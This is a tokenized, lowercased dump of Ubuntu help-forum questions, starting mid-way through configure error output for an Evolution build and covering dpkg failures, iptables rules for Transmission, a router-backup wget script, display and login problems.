from gcc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no checking for pkg-config ... ( cached ) /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking whether to build with code coverage support ... no checking for itstool ... itstool checking for xmllint ... xmllint checking for gtkdoc-check ... no checking for gtkdoc-rebase ... no checking for gtkdoc-mkpdf ... no checking whether to build gtk-doc documentation ... no checking for win32 ... no checking for nl_langinfo ... yes checking for nl_langinfo ( _nl_measurement_measurement ) ... yes checking for gnome_platform ... no configure : error : package requirements ( gio-2.0 > = 2.36.0 gmodule-2.0 > = 2.36.0 cairo-gobject gtk+-3.0 > = 3.8.0 gail-3.0 > = 3.8.0 gdk-pixbuf-2.0 > = 2.24.0 gcr-3 > = 3.4 libxml-2.0 > = 2.7.3 shared-mime-info > = 0.22 gnome-desktop-3.0 > = 2.91.3 gsettings-desktop-schemas > = 2.91.92 webkitgtk-3.0 > = 2.0.1 ) were not met : no package 'cairo-gobject ' found no package 'gtk+-3.0 ' found no package 'gail-3.0 ' found no package 'gdk-pixbuf-2.0 ' found no package 'gcr-3 ' found no package 'libxml-2.0 ' found no package 'gnome-desktop-3.0 ' found no package 'gsettings-desktop-schemas ' found no package 'webkitgtk-3.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables gnome_platform_cflags and gnome_platform_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . mehdix @ werkstatt : ~/downloads/evolution-3.13.1 $ edit : i did sudo apt-get build-dep evolution and this issue solved but now i have another issue : mehdix @ werkstatt : ~/downloads/evolution-3.13.1 $ auto-apt run ./configure entering auto-apt mode : ./configure exit the command to leave auto-apt mode . checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether make supports nested variables ... yes checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking for supported compiler flags ... -wall -wextra -wdeprecated-declarations -wno-missing-field-initializers -wno-sign-compare -wno-unused-parameter -wdeclaration-after-statement -werror-implicit-function-declaration -wformat-security -winit-self -wmissing-declarations -wmissing-include-dirs -wmissing-noreturn -wnested-externs -wpointer-arith -wredundant-decls -wundef -wwrite-strings checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking whether to enable maintainer-specific portions of makefiles ... yes checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking dependency style of gcc ... ( cached ) gcc3 checking for inline ... inline checking how to run the c preprocessor ... gcc -e checking whether gcc and cc understand -c and -o together ... yes checking whether ln -s works ... yes checking whether make sets $ ( make ) ... ( cached ) yes checking for gawk ... ( cached ) mawk checking for perl ... /usr/bin/perl checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.16 ... yes checking whether nls is requested ... yes checking for intltool > = 0.40.0 ... 0.50.2 found checking for intltool-update ... /usr/bin/intltool-update checking for intltool-merge ... /usr/bin/intltool-merge checking for intltool-extract ... /usr/bin/intltool-extract checking for xgettext ... /usr/bin/xgettext checking for msgmerge ... /usr/bin/msgmerge checking for msgfmt ... /usr/bin/msgfmt checking for gmsgfmt ... /usr/bin/msgfmt checking for perl ... /usr/bin/perl checking for perl > = 5.8.1 ... 5.18.2 checking for xml : :parser ... ok checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format ... func_convert_file_noop checking how to convert x86_64-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no checking for pkg-config ... ( cached ) /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking whether to build with code coverage support ... no checking for itstool ... itstool checking for xmllint ... xmllint checking for gtkdoc-check ... /usr/bin/gtkdoc-check checking for gtkdoc-rebase ... /usr/bin/gtkdoc-rebase checking for gtkdoc-mkpdf ... /usr/bin/gtkdoc-mkpdf checking whether to build gtk-doc documentation ... no checking for win32 ... no checking for nl_langinfo ... yes checking for nl_langinfo ( _nl_measurement_measurement ) ... yes checking for gnome_platform ... yes checking for evolution_data_server ... no configure : error : package requirements ( camel-1.2 > = 3.13.1 libebook-1.2 > = 3.13.1 libecal-1.2 > = 3.13.1 libedataserver-1.2 > = 3.13.1 libebackend-1.2 > = 3.13.1 ) were not met : requested 'camel-1.2 > = 3.13.1 ' but version of camel is 3.10.4 requested 'libebook-1.2 > = 3.13.1 ' but version of libebook is 3.10.4 requested 'libecal-1.2 > = 3.13.1 ' but version of libecal is 3.10.4 requested 'libedataserver-1.2 > = 3.13.1 ' but version of libedataserver is 3.10.4 requested 'libebackend-1.2 > = 3.13.1 ' but version of libebackend is 3.10.4 consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables evolution_data_server_cflags and evolution_data_server_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . mehdix @ werkstatt : ~/downloads/evolution-3.13.1 $ sudo apt-get build-dep
460645	unable to print to shared printer from ubuntu 14.04	i 've configured a usb printer in windows 7 and configured it as a shared printer . i can print from windows , but not from ubuntu . i have samba installed . please assist me on this .
460646	dynamically enable lan traffic in firewalld ( using profiles in network-manager )	i am trying to use firewalld to allow dynamic profiles for different connections in network manager . when i 'm at home , however , i would like to allow anything coming in on the lan ( local subnet ) . i can easily set the local subnet in rules , of course , but i really would like to have the local subnet set by the network . if i am in another trusted network i do n't want to have to configure the local subnet for that network in the firewall . example , in my home lan my system has a local subnet of 10.0.0.1/255.255.255.0 but at my father 's house his local subnet is 192.168.0.1/255.255.255.0 and at my friend 's house he uses 10.0.1.1/255.255.255.0 and i 'd rather not have to configure an explicite firewall zone for each of those . in windows it will detect my local subnet and usually automatically makes those rules permissive . i do n't want to do this globally as my work uses the same local subnet as my home network and i do n't trust that network beyond a few required services . any help would be appreciated .
460651	how to deal with `` errors were found while checking the disk drive for / '' in a server ?	it seems a little stupid for a operating system this behavior in a server operating system . the problem is very simple to replicate on ubuntu server : just change the date back in time and then reboot the system . the boot process stops at : errors were found while checking the disk drive for / . press f to attempt to fix the errors , i to ignore , s to skip mounting or m for manual recovery ok , it 's fine when you have a keyboard front of you ... just press f and the life goes on ... the problem is : how to deal with that in a remote server where you 're supposed to just access it via ssh ? because ssh server starts after this prompt . in other words , when you change your date to a date back in time , if you reboot , you ca n't log in anymore . kind of stupid ... is there a way to definitely disable this `` fix '' so i can guarantee my reboot is gon na be completed at least enough for my openssh server to start ? should n't it be considered a bug ? openssh is supposed to be alive all the time in a server !
460653	what is security_policy_version_matches_framework in ubuntu touch	i 'm writing an application for ubuntu for phones and need to know what security_policy_version_matches_framework . i submitted an app but got this back : - '' security_policy_version_matches_framework ( numpuzzle.json ) '' : { '' text '' : `` 1.0 ! = 1.1 ( ubuntu-sdk-14.04-dev1 ) '' how can i resolve this ? ?
460655	go to line in gedit	how can we go to a specific line in gedit ? i use ctrl+l but nothing shows to ask which line to go to . i found those keys in here
460656	shell script backup routers	below is a script i 've wrote to backup my routers and adsl modem , any ideas to compact this script in less lines ? each router have a different kind of structure as you can see . # ! /bin/sh http_txt= '' 10.0.0.59 '' cgi= '' 10.0.0.60 '' http= '' 10.0.0.66 '' date= '' $ ( date + % d- % m- % y ) '' dest= '' /home/yamash/ '' archive_file= '' $ dest $ date.tgz '' local= '' $ dest $ date '' login= '' admin '' pass= '' password '' mkdir $ local cd `` $ local '' echo `` iniciando backup '' for http_txt_for in $ http_txt ; do echo `` $ http_txt_for '' wget -- auth-no-challenge -- user= $ login -- password= $ pass $ http_txt_for/config.dat -o $ http_txt_for.dat done for cgi_for in $ cgi ; do echo `` $ cgi_for '' wget -- user= $ login -- password= $ pass $ cgi_for/cgi-bin/export_settings.cgi -o $ cgi_for.dat done for http_for in $ http ; do echo `` $ http_for '' wget -- user= $ login -- password= $ pass $ http_for/rom-0 -o $ http_for done cd .. tar czf $ archive_file $ local # rm -r $ archive_file $ local echo `` backup finalizado ''
460658	both available-old & available missing from dpkg - `` dpkg : error : failed to open package info file `/var/lib/dpkg/available ' for reading ''	issue : many threads try to solve the broken packages problem using the options as below . however my main problem is that both the available & available-old do not exist . i have no clue how i ended up deleting them ( if it wasnt because of a corrupt package , instead ) sudo dpkg -- clear-avail & & sudo apt-get update sudo dpkg-reconfigure -a ekta @ superwomen : ~ $ sudo apt-get dselect-upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : bluez bluez-alsa bluez-cups bluez-gstreamer cython dpkg dpkg-dev firefox firefox-globalmenu firefox-locale-en flashplugin-installer gnome-settings-daemon libbluetooth3 libdpkg-perl liblcms2-2 thunderbird thunderbird-gnome-support thunderbird-locale-en thunderbird-locale-en-us unity-greeter 20 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/72.5 mb of archives . after this operation , 15.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... dpkg : error : failed to open package info file `/var/lib/dpkg/available ' for reading : no such file or directory e : sub-process /usr/bin/dpkg returned an error code ( 2 ) sudo do-release-upgrade dpkg : error : failed to open package info file `/var/lib/dpkg/available ' for reading : no such file or directory e : sub-process /usr/bin/dpkg returned an error code ( 2 ) -- - from update manager -- - installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... dpkg : error : failed to open package info file `/var/lib/dpkg/available ' for reading : no such file or directory dpkg : error : failed to open package info file `/var/lib/dpkg/available ' for reading : no such file or directory e : sub-process /usr/bin/dpkg returned an error code ( 2 ) i am on ubuntu 12.04 lts & here 's the contents of /var/lib/dpkg ekta @ superwomen : /var/lib/dpkg $ ls -l total 9932 drwxr-xr-x 2 root root 4096 apr 29 15:23 alternatives drwxr-xr-x 2 root root 372736 may 4 20:08 info -rw-r -- r -- 1 root root 0 may 4 22:31 lock drwxr-xr-x 2 root root 4096 apr 13 2012 parts -rw-r -- r -- 1 root root 1975559 may 4 22:32 status -rw-r -- r -- 1 root root 1947927 may 4 21:39 status-bad -rw-r -- r -- 1 root root 1947932 may 4 20:48 status-old -rw-r -- r -- 1 root root 1947932 may 4 21:48 status_ekta -rw-r -- r -- 1 root root 1948728 may 4 20:48 status~ drwxr-xr-x 2 root root 4096 apr 29 15:23 triggers drwxr-xr-x 2 root root 4096 may 4 21:39 updates status_ekta is a manually created backup & status-bad reflects that i did this manipulation to the `` main '' status file before taking the backup ( in a different folder ) . status file , thus should be fine . i also tried purge , autoremove - which basically removed the corrupt packages , but does not solve the main problem of not having the `` list '' of available packages . my question : 1 . what does the available file have anyway ? can i update this manually using dpkg -l somehow ? 2 . how do i solve this without complete re-install , and if there are stable alternatives to apt-get ( apt-get is only for dpkg i assume ? ) what else will i have to live without , if i do not fix this ? i also deselected the ppa repos from update manager & selected the `` main server '' , as a part of canonical troubleshooting here , but it did not help . here 's what i have in my `` status '' file - ekta @ superwomen : /var/lib/dpkg $ cat status | grep `` status : '' | sort -u status : deinstall ok config-files status : install ok installed
460660	how do i find out what intel integrated graphics controller i 'm using ?	i 'm currently using ubuntu 12.04 lts and i want to know what version of the graphics controller i 'm using . the motherboard for my system is a gateway 4000856 thrasher . what i do know is my controller is from intel . my reasoning is for this is so i can get the proper drivers and finally get adobe flash content to work properly ( the content will display squashed , with a greenish-purple ) .
460662	recover files from old ubuntu server	i am facing the situation that my old ubuntu server 8 is not working ( meaning i have no possibility to log-into the system ) . all the files are intact , however i do not know how i can extract the files on the old server . i want to install a new server with the newest version , and then move the files onto this server . how is it possible to get these files from the hard drive ?
460667	how does one choose between windows 8.1. and ubuntu at startup if the two are on different hard drives ?	i am running windows 8.1. and have just installed a second hard drive on which i have installed ubuntu . now when i switch the machine on , it boots to ubuntu but how can i use the two operating systems interchangeably ? in other words , how can i choose an operating system at startup ? can someone please explain to me without being too technical as i am not that literate . thanks .
460668	how to use python3 in emacs on ubuntu 14.04	i am using emacs in python mode . to run a python file i use the command c-c c-c. emacs automatically start to run python 2.7 while i would like to use python3 . once i have been able to solve using this method link but now it is not working on ubuntu 14.04 how can i solve this ?
460669	output via hdmi only , not laptop screen	dell xps 17 on 14.04 using nvidia drivers , was working fine , but now only shows output on the screen connected via hdmi connection , and not the laptop screen . there 's output on the laptop screen when its booting etc , so i know it still works ok , but neither the 'settings > display ' tool , nvidia-settings , or xrandr detects the laptop screen anymore . eg buddha : ~ > xrandr screen 0 : minimum 8 x 8 , current 1920 x 1080 , maximum 16384 x 16384 hdmi-0 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis ) 598mm x 337mm 1920x1080 60.0*+ 59.9 50.0 60.1 60.0 50.0 1680x1050 60.0 1600x900 60.0 1440x900 59.9 1400x1050 60.0 1280x1024 75.0 60.0 1280x800 59.8 1280x720 60.0 59.9 50.0 1152x864 75.0 1024x768 75.0 60.0 800x600 75.0 60.3 720x576 50.0 720x480 59.9 640x480 75.0 59.9 59.9 any way to 'reset ' this so that it detects the inbuilt screen again ?
460670	ubuntu 13.10 , after update login loop	so , today i update some packages and then i shut it down . when i turn it on , it ask for a pw ( i had automatic login ) . tried several things , removing .xauthority , .cache and .iceauthority , check rights on /tmp , reconfiguring ubuntu-desktop and lightdm nothing this is my auth.log may 4 19:14:17 elect-desktop lightdm : pam_unix ( lightdm-greeter : session ) : session closed for user lightdm may 4 19:14:17 elect-desktop lightdm : pam_unix ( lightdm : session ) : session opened for user elect by ( uid=0 ) may 4 19:14:17 elect-desktop systemd-logind [ 612 ] : new session c4 of user elect . may 4 19:14:17 elect-desktop systemd-logind [ 612 ] : linked /tmp/.x11-unix/x0 to /run/user/1000/x11-display . may 4 19:14:18 elect-desktop lightdm : pam_unix ( lightdm : session ) : session closed for user elect may 4 19:14:19 elect-desktop lightdm : pam_unix ( lightdm-greeter : session ) : session opened for user lightdm by ( uid=0 ) may 4 19:14:19 elect-desktop systemd-logind [ 612 ] : removed session c4 . may 4 19:14:19 elect-desktop systemd-logind [ 612 ] : new session c5 of user lightdm . may 4 19:14:19 elect-desktop lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` elect '' may 4 19:14:19 elect-desktop lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` elect '' any clue ?
460672	how to block ips similar to editing the hosts file on windows	i have recently switched to ubuntu and need to block a few ips for gaming . previously , i could simply add a line to the file in c : \windows\system32\drivers\etc\hosts but i am unsure how to do this on ubuntu . how can i block these ips on ubuntu ? thanks in advance p.s . i am running ubuntu on an external hard drive connected to the main computer with windows .
460673	firewall rules for transmission	i have transmission installed , which listens on the default port 51413 . i have tried opening everything for this port . iptables : chain input ( policy accept ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : ssh accept icmp -- 'server ip ' anywhere state new , related , established icmp echo-request accept icmp -- anywhere anywhere state related , established icmp echo-reply accept udp -- anywhere anywhere state related , established udp spt : domain dpts:1024:65535 accept tcp -- anywhere anywhere tcp spt : http accept tcp -- anywhere anywhere tcp dpt : http accept udp -- anywhere anywhere udp spt : bootpc dpt : bootps accept tcp -- anywhere anywhere tcp dpt:9091 accept tcp -- anywhere anywhere tcp dpt:51413 accept udp -- anywhere anywhere udp dpt:51513 accept tcp -- anywhere anywhere tcp spt:51413 accept udp -- anywhere anywhere udp spt:51413 logging all -- anywhere anywhere drop all -- anywhere anywhere chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination accept tcp -- anywhere anywhere tcp spt : ssh accept icmp -- anywhere anywhere state new , related , established icmp echo-request accept icmp -- anywhere anywhere state related , established icmp echo-reply accept udp -- anywhere anywhere udp dpt : domain accept tcp -- anywhere anywhere tcp dpt : http accept tcp -- anywhere anywhere tcp spt : http accept udp -- anywhere anywhere udp spt : bootps dpt : bootpc accept tcp -- anywhere anywhere tcp spt:9091 accept tcp -- anywhere anywhere tcp spt:51413 accept udp -- anywhere anywhere udp spt:51413 accept tcp -- anywhere anywhere tcp dpt:51413 accept udp -- anywhere anywhere udp dpt:51413 logging all -- anywhere anywhere drop all -- anywhere anywhere chain logging ( 2 references ) target prot opt source destination log all -- anywhere anywhere limit : avg 12/min burst 5 log level warning prefix `` firewalldrops : `` drop all -- anywhere anywhere but it still wo n't let traffic through . if i flush the tables : iptables -f it then works , so i imagine there is something i 'm missing in iptables . logging output : /var/log/kern.log : may 5 18:43:32 stretchsvr kernel : [ 9.258012 ] firewalldrops : in= out=lo src=127.0.0.1 dst=127.0.0.1 len=72 tos=0x00 prec=0xc0 ttl=64 id=2371 proto=icmp type=3 code=3 [ src=127.0.0.1 dst=127.0.0.1 len=44 tos=0x00 prec=0x00 ttl=64 id=2370 df proto=udp spt=51413 dpt=80 len=24 ] /var/log/kern.log : may 5 18:43:32 stretchsvr kernel : [ 9.298081 ] firewalldrops : in=eth0 out= mac='svr mac address ' src=62.210.137.203 dst='svr ip address ' len=44 tos=0x00 prec=0x00 ttl=53 id=55801 proto=udp spt=1337 dpt=51413 len=24 /var/log/kern.log : may 5 18:43:32 stretchsvr kernel : [ 9.305079 ] firewalldrops : in=eth0 out= mac='svr mac address ' src=31.172.63.226 dst='svr ip address ' len=44 tos=0x00 prec=0x00 ttl=50 id=0 df proto=udp spt=80 dpt=51413 len=24 /var/log/kern.log : may 5 18:44:53 stretchsvr kernel : [ 90.444453 ] firewalldrops : in=eth0 out= mac='svr mac address ' src=62.210.137.203 dst='svr ip address ' len=44 tos=0x00 prec=0x00 ttl=54 id=55802 proto=udp spt=1337 dpt=51413 len=24 /var/log/kern.log : may 5 18:44:53 stretchsvr kernel : [ 90.453131 ] firewalldrops : in=eth0 out= mac='svr mac address ' src=31.172.63.225 dst='svr ip address ' len=44 tos=0x00 prec=0x00 ttl=50 id=0 df proto=udp spt=6969 dpt=51413 len=24 /var/log/kern.log : may 5 18:44:53 stretchsvr kernel : [ 90.456361 ] firewalldrops : in=eth0 out= mac='svr mac address ' src=31.172.63.226 dst='svr ip address ' len=44 tos=0x00 prec=0x00 ttl=50 id=0 df proto=udp spt=80 dpt=51413 len=24 /var/log/kern.log : may 5 18:44:53 stretchsvr kernel : [ 90.458255 ] firewalldrops : in=eth0 out= mac='svr mac address ' src=31.172.63.252 dst='svr ip address ' len=44 tos=0x00 prec=0x00 ttl=51 id=0 df proto=udp spt=80 dpt=51413 len=24 /var/log/kern.log : may 5 18:45:01 stretchsvr kernel : [ 98.435703 ] firewalldrops : in= out=lo src=127.0.0.1 dst=127.0.0.1 len=72 tos=0x00 prec=0xc0 ttl=64 id=2373 proto=icmp type=3 code=3 [ src=127.0.0.1 dst=127.0.0.1 len=44 tos=0x00 prec=0x00 ttl=64 id=2372 df proto=udp spt=51413 dpt=80 len=24 ] /var/log/syslog : may 5 18:43:32 stretchsvr kernel : [ 9.258012 ] firewalldrops : in= out=lo src=127.0.0.1 dst=127.0.0.1 len=72 tos=0x00 prec=0xc0 ttl=64 id=2371 proto=icmp type=3 code=3 [ src=127.0.0.1 dst=127.0.0.1 len=44 tos=0x00 prec=0x00 ttl=64 id=2370 df proto=udp spt=51413 dpt=80 len=24 ] /var/log/syslog : may 5 18:43:32 stretchsvr kernel : [ 9.298081 ] firewalldrops : in=eth0 out= mac='svr mac address ' src=62.210.137.203 dst='svr ip address ' len=44 tos=0x00 prec=0x00 ttl=53 id=55801 proto=udp spt=1337 dpt=51413 len=24 /var/log/syslog : may 5 18:43:32 stretchsvr kernel : [ 9.305079 ] firewalldrops : in=eth0 out= mac='svr mac address ' src=31.172.63.226 dst='svr ip address ' len=44 tos=0x00 prec=0x00 ttl=50 id=0 df proto=udp spt=80 dpt=51413 len=24 /var/log/syslog : may 5 18:44:53 stretchsvr kernel : [ 90.444453 ] firewalldrops : in=eth0 out= mac='svr mac address ' src=62.210.137.203 dst='svr ip address ' len=44 tos=0x00 prec=0x00 ttl=54 id=55802 proto=udp spt=1337 dpt=51413 len=24 /var/log/syslog : may 5 18:44:53 stretchsvr kernel : [ 90.453131 ] firewalldrops : in=eth0 out= mac='svr mac address ' src=31.172.63.225 dst='svr ip address ' len=44 tos=0x00 prec=0x00 ttl=50 id=0 df proto=udp spt=6969 dpt=51413 len=24 /var/log/syslog : may 5 18:44:53 stretchsvr kernel : [ 90.456361 ] firewalldrops : in=eth0 out= mac='svr mac address ' src=31.172.63.226 dst='svr ip address ' len=44 tos=0x00 prec=0x00 ttl=50 id=0 df proto=udp spt=80 dpt=51413 len=24 /var/log/syslog : may 5 18:44:53 stretchsvr kernel : [ 90.458255 ] firewalldrops : in=eth0 out= mac='svr mac address ' src=31.172.63.252 dst='svr ip address ' len=44 tos=0x00 prec=0x00 ttl=51 id=0 df proto=udp spt=80 dpt=51413 len=24 any help appreciated .
460675	using ubuntu server to pxe install operating systems ?	i was wondering if ubuntu server could be used to have a library of various operating system images ( say , windows 7 , 8 & windows server 2008/2012 and possibly ubuntu itself ) that could be installed to client machines over the network . possibly by pxe , cd or usb booting to something that would access the said network/server/library . i 've done a little homework into things like tftp and pxe booting , but i 've never come across a specific `` follow this tutorial '' solution that would allow me to use the ubuntu server in my workshop to push operating systems onto machines connected via a switch . the practical application for this would be having it firms , depts or msp 's capable of using kvm & switch stations to do os reloads in bulk without having to haul slower physical media around from station to station . i suppose you might compare this to a multi-platform counterpart to waik ? insight greatly appreciated friends : )
460676	pspp output file does not open up in ubuntu 12.04	i am new to pspp , and i am fluent in spss . i recently installed pspp in ubuntu 12.04 , however the output file does not open . i already removed and re-installed pspp . any help will be highly appreciated .
460677	skype logout ( pc logout ) when activating the user interface	i have a problem with my skype ( version 4.2.0.11 ) , when i open it i instantly logout from computer . i tried to remove ( also remove it by using -- purge ) and reinstall from terminal however same problem occurred again . i also tried to open it from terminal but all same . same problem occurred with emacs too .
460678	wallpaper and unity ui text smears	i have the same problem as in this previously asked and not answered question : what may cause the desktop wallpaper to be scrambled ? here are some of the recommended cli commands to post here : sudo lsb_release -a : no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty sudo uname -a : linux igmuska-1525 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux sudo dpkg -l | grep xserver-xorg-video : ii xserver-xorg-video-all 1:7.7+1ubuntu8 amd64 x.org x server -- output driver metapackage ii xserver-xorg-video-ati 1:7.3.0-1ubuntu3 amd64 x.org x server -- amd/ati display driver wrapper ii xserver-xorg-video-cirrus 1:1.5.2-1build1 amd64 x.org x server -- cirrus display driver ii xserver-xorg-video-fbdev 1:0.4.4-1build1 amd64 x.org x server -- fbdev display driver ii xserver-xorg-video-glamoregl 0.6.0-0ubuntu4 amd64 x.org x server -- graphics acceleration module based on opengl ii xserver-xorg-video-intel 2:2.99.910-0ubuntu1 amd64 x.org x server -- intel i8xx , i9xx display driver ii xserver-xorg-video-mach64 6.9.4-1build1 amd64 x.org x server -- ati mach64 display driver ii xserver-xorg-video-mga 1:1.6.3-1build1 amd64 x.org x server -- mga display driver ii xserver-xorg-video-modesetting 0.8.1-1build1 amd64 x.org x server -- generic modesetting driver ii xserver-xorg-video-neomagic 1:1.2.8-1build1 amd64 x.org x server -- neomagic display driver ii xserver-xorg-video-nouveau 1:1.0.10-1ubuntu2 amd64 x.org x server -- nouveau display driver ii xserver-xorg-video-openchrome 1:0.3.3-1build1 amd64 x.org x server -- via display driver ii xserver-xorg-video-qxl 0.1.1-0ubuntu3 amd64 x.org x server -- qxl display driver ii xserver-xorg-video-r128 6.9.2-1build1 amd64 x.org x server -- ati r128 display driver ii xserver-xorg-video-radeon 1:7.3.0-1ubuntu3 amd64 x.org x server -- amd/ati radeon display driver ii xserver-xorg-video-s3 1:0.6.5-0ubuntu4 amd64 x.org x server -- legacy s3 display driver ii xserver-xorg-video-savage 1:2.3.7-2ubuntu2 amd64 x.org x server -- savage display driver ii xserver-xorg-video-siliconmotion 1:1.7.7-2build1 amd64 x.org x server -- siliconmotion display driver ii xserver-xorg-video-sis 1:0.10.7-0ubuntu6 amd64 x.org x server -- sis display driver ii xserver-xorg-video-sisusb 1:0.9.6-2build1 amd64 x.org x server -- sis usb display driver ii xserver-xorg-video-tdfx 1:1.4.5-1build1 amd64 x.org x server -- tdfx display driver ii xserver-xorg-video-trident 1:1.3.6-0ubuntu5 amd64 x.org x server -- trident display driver ii xserver-xorg-video-vesa 1:2.3.3-1build1 amd64 x.org x server -- vesa display driver ii xserver-xorg-video-vmware 1:13.0.2-2ubuntu1 amd64 x.org x server -- vmware display driver sudo lspci | grep vga : 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) i have also installed and ran compizconfig settings manager on a dead , but hopeful , end . my laptop is a dell inspiron 1525 , 3gb memory . chromium seems to be the elephant in the room . i 've had the smearing issue with both 13.10 and now 14.04 . i have noticed through run repeatedly `` free -m '' that my swap is rarely used as shown below : free -m : total used free shared buffers cached mem : 3000 2260 739 209 42 973 -/+ buffers/cache : 1244 1755 swap : 3059 242 2817 i 've not found a suitable solution except for a reboot , which is unacceptable for obvious reasons . i did , however , a workaround : go to settings , change to another wallpaper , change back to my desired wallpaper , fixing the smearing ; then to clear up the smeared gui text , i switched from the default theme `` ambiance '' to `` radiance '' .
